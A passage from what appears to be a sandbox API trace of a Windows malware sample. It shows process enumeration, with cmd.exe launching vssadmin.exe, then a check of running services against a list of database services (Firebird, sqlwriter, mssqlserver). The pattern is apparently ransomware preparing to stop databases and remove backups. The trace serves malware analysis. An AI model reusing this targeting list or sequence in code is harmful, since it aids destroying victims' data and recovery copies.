cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.231] lstrlenW (lpString="svchost.exe") returned 11 [0036.231] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.231] lstrlenW (lpString="svchost.exe") returned 11 [0036.231] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0036.232] lstrlenW (lpString="dwm.exe") returned 7 [0036.232] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0036.233] lstrlenW (lpString="explorer.exe") returned 12 [0036.233] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0036.234] lstrlenW (lpString="spoolsv.exe") returned 11 [0036.234] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.234] lstrlenW (lpString="taskhost.exe") returned 12 [0036.234] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0036.235] lstrlenW (lpString="svchost.exe") returned 11 [0036.235] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0036.236] lstrlenW (lpString="taskeng.exe") returned 11 [0036.236] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0036.236] lstrlenW (lpString="taskhost.exe") returned 12 [0036.237] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0036.237] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0036.237] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0036.238] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0036.238] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0036.239] lstrlenW (lpString="sa_shape.exe") returned 12 [0036.239] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0036.239] lstrlenW (lpString="confidence.exe") returned 14 [0036.239] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0036.240] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0036.240] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0036.423] lstrlenW (lpString="blue.exe") returned 8 [0036.423] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0036.423] lstrlenW (lpString="newly debut.exe") returned 15 [0036.423] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0036.424] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0036.424] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0036.425] lstrlenW (lpString="archive.exe") returned 11 [0036.425] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0036.425] lstrlenW (lpString="defend.exe") returned 10 [0036.426] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0036.426] lstrlenW (lpString="arservice.exe") returned 13 [0036.426] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0036.427] lstrlenW (lpString="rr-programmer.exe") returned 17 [0036.427] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0036.428] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0036.428] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0036.429] lstrlenW (lpString="twistedmonton.exe") returned 17 [0036.429] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0036.430] lstrlenW (lpString="arc plains.exe") returned 14 [0036.430] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0036.430] lstrlenW (lpString="americahousestip.exe") returned 20 [0036.430] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0036.431] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0036.431] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0036.432] lstrlenW (lpString="medical lectures.exe") returned 20 [0036.432] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0036.432] lstrlenW (lpString="electronic.exe") returned 14 [0036.433] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0036.433] lstrlenW (lpString="regression.exe") returned 14 [0036.433] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0036.434] lstrlenW (lpString="county.exe") returned 10 [0036.434] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0036.435] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0036.435] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.435] lstrlenW (lpString="dllhost.exe") returned 11 [0036.435] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.436] lstrlenW (lpString="dllhost.exe") returned 11 [0036.436] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0036.437] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0036.437] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0036.437] lstrlenW (lpString="cmd.exe") returned 7 [0036.437] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.438] lstrlenW (lpString="conhost.exe") returned 11 [0036.438] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0036.439] lstrlenW (lpString="vssadmin.exe") returned 12 [0036.439] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0036.440] lstrlenW (lpString="VSSVC.exe") returned 9 [0036.440] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0036.440] CloseHandle (hObject=0x1bc) returned 1 [0036.440] Sleep (dwMilliseconds=0x1f4) [0037.072] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232cc0 [0037.073] EnumServicesStatusExW (in: hSCManager=0x4232cc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0037.073] GetLastError () returned 0xea [0037.073] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x123e) returned 0xbcaca8 [0037.074] EnumServicesStatusExW (in: hSCManager=0x4232cc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbcaca8, cbBufSize=0x123e, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbcaca8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0037.074] CloseServiceHandle (hSCObject=0x4232cc0) returned 1 [0037.075] lstrlenW (lpString="Appinfo") returned 7 [0037.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0037.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0037.075] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0037.075] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0037.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0037.075] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0037.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0037.075] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0037.075] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0037.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0037.075] lstrlenW (lpString="AudioSrv") returned 8 [0037.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0037.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0037.075] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0037.075] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0037.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0037.075] lstrlenW (lpString="BFE") returned 3 [0037.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0037.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0037.075] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0037.075] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0037.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0037.075] lstrlenW (lpString="CryptSvc") returned 8 [0037.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0037.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0037.075] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0037.075] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0037.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0037.075] lstrlenW (lpString="CscService") returned 10 [0037.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0037.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0037.076] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0037.076] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0037.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0037.076] lstrlenW (lpString="DcomLaunch") returned 10 [0037.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0037.076] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0037.076] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0037.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0037.076] lstrlenW (lpString="Dhcp") returned 4 [0037.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0037.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0037.076] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0037.076] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0037.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0037.076] lstrlenW (lpString="Dnscache") returned 8 [0037.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0037.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0037.076] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0037.076] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0037.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0037.076] lstrlenW (lpString="DPS") returned 3 [0037.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0037.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0037.076] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0037.076] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0037.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0037.076] lstrlenW (lpString="eventlog") returned 8 [0037.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0037.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0037.076] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0037.076] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0037.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0037.077] lstrlenW (lpString="EventSystem") returned 11 [0037.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0037.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0037.077] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0037.077] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0037.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0037.077] lstrlenW (lpString="gpsvc") returned 5 [0037.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0037.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0037.077] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0037.077] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0037.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0037.077] lstrlenW (lpString="iphlpsvc") returned 8 [0037.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0037.077] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0037.077] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0037.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0037.077] lstrlenW (lpString="LanmanServer") returned 12 [0037.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0037.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0037.077] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0037.077] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0037.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0037.077] lstrlenW (lpString="LanmanWorkstation") returned 17 [0037.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0037.077] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0037.077] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0037.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0037.077] lstrlenW (lpString="lmhosts") returned 7 [0037.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0037.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0037.077] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0037.077] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0037.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0037.078] lstrlenW (lpString="MMCSS") returned 5 [0037.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0037.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0037.078] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0037.078] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0037.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0037.078] lstrlenW (lpString="MpsSvc") returned 6 [0037.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0037.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0037.078] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0037.078] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0037.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0037.078] lstrlenW (lpString="Netman") returned 6 [0037.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0037.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0037.078] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0037.078] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0037.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0037.078] lstrlenW (lpString="netprofm") returned 8 [0037.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0037.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0037.078] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0037.078] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0037.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0037.078] lstrlenW (lpString="NlaSvc") returned 6 [0037.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0037.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0037.078] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0037.078] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0037.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0037.078] lstrlenW (lpString="nsi") returned 3 [0037.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0037.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0037.079] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0037.079] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0037.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0037.079] lstrlenW (lpString="PcaSvc") returned 6 [0037.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0037.079] lstrcmpiW 